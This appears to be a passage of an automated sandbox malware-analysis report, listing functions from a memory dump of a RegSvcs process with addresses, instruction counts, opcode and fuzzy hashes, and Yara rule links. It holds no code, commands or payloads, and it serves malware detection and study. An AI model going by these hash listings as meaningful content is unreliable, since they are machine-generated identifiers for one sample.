                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                              • Instruction ID: aff961414885518750df08aca769a428d9c8cca23bdf262806ab0d648d571800
                                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                              • Instruction Fuzzy Hash: D3F0B472610204AFE714DF26CC01F96BAEDEFA8750F148479A945DB270FAB0ED01C654
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EC912 Relevance: .0, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 723c6de4449d10bcc2a7256cdfa47cdaab525c11aa0067743fbac7f57c2b6b90
                                                                                                                              • Instruction ID: aec75e8c872a6ef6cdc91abebcdcfa715b9e3e032ef0da20a9f23c9cce421f3d
                                                                                                                              • Opcode Fuzzy Hash: 723c6de4449d10bcc2a7256cdfa47cdaab525c11aa0067743fbac7f57c2b6b90
                                                                                                                              • Instruction Fuzzy Hash: 1EF0C270A00209EFCB04EF69C555A9EBBF4FF28300F01805AB815EB395DA34EA01CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014647FB Relevance: .0, Instructions: 33COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a225eb9ef458fdae7c978a1a4c9ee1ae211d62539caf15aa472130b765509461
                                                                                                                              • Instruction ID: f1b416f81e263ae845ba701f870912d1fdb31e2210c680c8f4decb3b1b2faac7
                                                                                                                              • Opcode Fuzzy Hash: a225eb9ef458fdae7c978a1a4c9ee1ae211d62539caf15aa472130b765509461
                                                                                                                              • Instruction Fuzzy Hash: BAF090399166D1DEEF33CB9CC044B62BBDC9B40B28F0C996BD54987632CB34D880C652
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01520115 Relevance: .0, Instructions: 32COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 51aa17867d4405ab7486d1992de1810a75cab485f555b8229b1e2e169c6d88bd
                                                                                                                              • Instruction ID: 092950a0c1f1b9822901b800ff420d45eb76be900fb7818b18eb65ec22e36359
                                                                                                                              • Opcode Fuzzy Hash: 51aa17867d4405ab7486d1992de1810a75cab485f555b8229b1e2e169c6d88bd
                                                                                                                              • Instruction Fuzzy Hash: A1F0277741B7D206DB735B2CAC602E92B74B782110F6A1485E8B15F289C7748487D320
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b74c514760b9768b1ea2403a0f8e917e731897f08f00a3a61ea890517c704d29
                                                                                                                              • Instruction ID: 79ef1000d6a1ce233898fafb68f18692401635da757ca81f0aa19c0935a75600
                                                                                                                              • Opcode Fuzzy Hash: b74c514760b9768b1ea2403a0f8e917e731897f08f00a3a61ea890517c704d29
                                                                                                                              • Instruction Fuzzy Hash: 9BF0BE715116519FEB22965CC188B527FD4AB84BA0F089427D40A87672C270EC82CAD1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A2619 Relevance: .0, Instructions: 31COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction ID: 6dce550f4cf3fe9e17033434188d01779b9c6cea24e1eab5e5f165902e18a0f6
                                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction Fuzzy Hash: 95E092723416012BE7119E5A8C80F47776E9FB6B10F45047EB6045E261C9F29D0982A4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F6030 Relevance: .0, Instructions: 29COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction ID: bf48d9e00438449c946693c8596777b826f2f83ec19a046d4d4ae741f53ba3a8
                                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                              • Instruction Fuzzy Hash: 6DF01CB21042049FE3218F09D944F52B7B8EB15364F56C42AE7099B661D37AEC40CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01460710 Relevance: .0, Instructions: 28COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                              • Instruction ID: 563cdcd9f69252faaec0a276131574eba3e47a998f39e84a999b1446ce635c59
                                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                              • Instruction Fuzzy Hash: FAF02B39204341DFEB1ACF19D050AD57BE8FB91364F0000A6FC428B321D735E982CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014949D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                              • Instruction ID: 31bd0c1aa16e802a1a4a24bc498dafd4b9b54ddf574e78cb6a9ba7aaa68c62b8
                                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                              • Instruction Fuzzy Hash: 4CE0D832244145ABDB211A59C900B677FA9DBE27B0F19042BE2009B270DB78DC43C7D8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01534164 Relevance: .0, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ebd36c05cd02be5c89d341cc247659bac93a56c463e5fd18fb249e1f99a8ed32
                                                                                                                              • Instruction ID: 6b477c967826ac9a909e6cdf60b69b4f3a60f917b6e11815f2e2f305f0ec3637
                                                                                                                              • Opcode Fuzzy Hash: ebd36c05cd02be5c89d341cc247659bac93a56c463e5fd18fb249e1f99a8ed32
                                                                                                                              • Instruction Fuzzy Hash: C8F06531A35E914FE772D76CD544B5D77E4BF94A30F1A4595D4058F922C734DC80C690
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0150678E Relevance: .0, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                              • Instruction ID: ee0aaf694efaa6ec198aa9b2518e56538859a3667ecb772b042607e2943b7c0f
                                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                              • Instruction Fuzzy Hash: 29E0DF32A00110BBDB22979A8E11F9ABEACEBA0EA0F050059B600EB0E0E530DE00C690
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 015308C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                              • Instruction ID: c2800569204c92f1827947a528bdb5affa1f85eeba47cbf0bb21b8d0feae8ebe
                                                                                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                              • Instruction Fuzzy Hash: 9AE09B316407508BCB258E5DD140A57F7E8FFD5660F158469E9054B653C231F852C6E0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014625E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 64c672e48f14c2d0c6303d1cbc6d7ccd6172589755a509d0aa231819127c32f3
                                                                                                                              • Instruction ID: 0f8367fa2275d49cd61b7a4d1d56fb12533cdfa0877824e3fdee0084d878b860
                                                                                                                              • Opcode Fuzzy Hash: 64c672e48f14c2d0c6303d1cbc6d7ccd6172589755a509d0aa231819127c32f3
                                                                                                                              • Instruction Fuzzy Hash: E0E09232100694ABC721BF2ADD01F8A779AEB70364F01451AB116571A0CA70AD10D794
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0151A456 Relevance: .0, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                              • Instruction ID: c2b2b39134c77c707125cdcf17fd66cc9b923ae7a93e1976b03c6b09418fc248
                                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                              • Instruction Fuzzy Hash: 86E09231051651DFF7336F2BC848B96BAE0BFA0711F148C2EA19A164B0C7B498C0DA40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                              • Instruction ID: ca49aa9da61b2dd0d3d666d679946ff504970e0134633a0e61ac43e0919928a5
                                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                              • Instruction Fuzzy Hash: B5E0AE743002058BE715CF19C044B627BA6BFD5A11F28C079A9488F705EB32A8428A40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149CA38 Relevance: .0, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 50764314970ddf0fb0f2bdf924fe0b4c6c9f0b74bec9cc1399f3879fa4fcbc82
                                                                                                                              • Instruction ID: a3724e03d3c916597575e287f586d2d64698e93ee1eefafba06981c988e7d8ab
                                                                                                                              • Opcode Fuzzy Hash: 50764314970ddf0fb0f2bdf924fe0b4c6c9f0b74bec9cc1399f3879fa4fcbc82
                                                                                                                              • Instruction Fuzzy Hash: 1AD02B324810606ACF35F2197D44FEB3E5DAB60270F024C63F10896030D57CCC8192C4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145823B Relevance: .0, Instructions: 21COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                              • Instruction ID: e330e64370211d2dbd9841a391945e83cf6b2665812be387d7c88d4ddcc4e3d8
                                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                              • Instruction Fuzzy Hash: 28E08631504512DFD7312F17DC00F527AA1FB74B50F11481FF441054758AB05882DA55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01462050 Relevance: .0, Instructions: 20COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4f1140632b19822841138cc6308c0c5fd97e955da7ce9642542707fbcd3b3ad2
                                                                                                                              • Instruction ID: b07245ec38a27840b98f84283a0f4a26c6518ea45d2007304cd014719a6cf110
                                                                                                                              • Opcode Fuzzy Hash: 4f1140632b19822841138cc6308c0c5fd97e955da7ce9642542707fbcd3b3ad2
                                                                                                                              • Instruction Fuzzy Hash: 4BE08C321005906BC721FA6EDD50E8A739EEBB4264F05022AB1558B2A0CA70AC00C7A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                              • Instruction ID: 83c0077cc0bc2f2c80b04d8312791da66087a606c45509036fd6d3ca55f5cba3
                                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                              • Instruction Fuzzy Hash: F2D0A7331045105FD7329A1DFC00FC333D8BB58720F05045AB004C7160C370AC41C644
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014DE908 Relevance: .0, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                              • Instruction ID: cad28a8eb5672bbbf751578060f2ea15d58065878165594b0f9c1ac3f3dd161a
                                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                              • Instruction Fuzzy Hash: 32E0EC369516849FDF22DF6AC650F5ABBF9BB94B40F550059A1086F671C634A900CB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                              • Instruction ID: 3d40e9e39496b7e26b41d083d79db267990267fcb01a7f73718a236fd7e86cf4
                                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                              • Instruction Fuzzy Hash: FAD0223322203097DB285A666800FA37905AB80A90F2A012E780A93920C0248C43D2E0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                              • Instruction ID: c11e8457ed1a5580f9fe9a1a491c8890776200296926f8be00510316b6238320
                                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                              • Instruction Fuzzy Hash: 78D012371D054DBBDB219F66DC01F957BA9E764BA0F444021B504875A0C63AE950D584
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d206c380ba6ef728919ed7ab07460a31a69a7729da59a9d5f7afb20c1a421845
                                                                                                                              • Instruction ID: 86ed9ff09c633e2b2fcd0061e0dfa5eda17ffd9ac04f1a11470f7ffb6ded4e0d
                                                                                                                              • Opcode Fuzzy Hash: d206c380ba6ef728919ed7ab07460a31a69a7729da59a9d5f7afb20c1a421845
                                                                                                                              • Instruction Fuzzy Hash: 95D092356555529BEF2ADF59CAA0A7A7AB4EF24641B80007EE60196630E339D8029A90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014702A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                              • Instruction ID: 226fc5b6db1ec40be34382494582456cc3eecbc6970613cecc841f53e042d223
                                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                              • Instruction Fuzzy Hash: 24D0923A616A80CFD66A8B0CC5A4B5633A4BB45A44F850491E401CBB32E638D940CA00
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction ID: 893b8dd11c1c459da3fb4ae522bb7c0b7f499e3bbfb7cf643e22aec0fbd4eff9
                                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction Fuzzy Hash: 8DC08033150644AFD711DF95CD01F4177A9F7A8B40F000021F30447570C531FC10E644
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01480310 Relevance: .0, Instructions: 11COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction ID: f3f17bf2bef5f65f6f13f8b2f9f5e39d4428f25bf33fdff9034013322e013e72
                                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction Fuzzy Hash: DED01236110248EFCB02EF45D890D9E772AFBD8710F108019FD19076108A31ED62DA50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01460750 Relevance: .0, Instructions: 9COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction ID: 15c294bef84c62b2b4f042c0d421796c333c48ec4eaeea12ac7812151c78ae24
                                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction Fuzzy Hash: 5CC00179601A428BDF16DA2AD294A8A77E4BB94740F150891E8099BB22E624E802DA21
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A4340 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
